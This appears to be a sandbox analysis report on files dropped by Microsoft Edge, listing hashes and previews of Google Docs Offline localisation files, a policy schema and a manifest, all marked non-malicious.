                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1320
                                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):884
                                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                            MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                            SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                            SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                            SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):980
                                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                            MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                            SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                            SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                            SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1941
                                                                                                                                                                            Entropy (8bit):4.132139619026436
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                            MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                            SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                            SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                            SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1969
                                                                                                                                                                            Entropy (8bit):4.327258153043599
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                            MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                            SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                            SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                            SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1674
                                                                                                                                                                            Entropy (8bit):4.343724179386811
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                            MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                            SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                            SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                            SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                            Entropy (8bit):4.853399816115876
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                            MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                            SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                            SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                            SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1333
                                                                                                                                                                            Entropy (8bit):4.686760246306605
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                            MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                            SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                            SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                            SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                            Entropy (8bit):4.861856182762435
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                            MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                            SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                            SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                            SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1074
                                                                                                                                                                            Entropy (8bit):5.062722522759407
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                            MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                            SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                            SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                            SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                            Entropy (8bit):5.7905809868505544
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                            MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                            SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                            SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                            SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1205
                                                                                                                                                                            Entropy (8bit):4.50367724745418
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                            MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                            SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                            SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                            SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                            Entropy (8bit):5.76581227215314
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                            MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                            SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                            SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                            SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):912
                                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11280
                                                                                                                                                                            Entropy (8bit):5.751992630887702
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                            MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                            SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                            SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                            SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                             Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2525
                                                                                                                                                                            Entropy (8bit):5.417833205646285
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                            MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                            SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                            SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                            SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
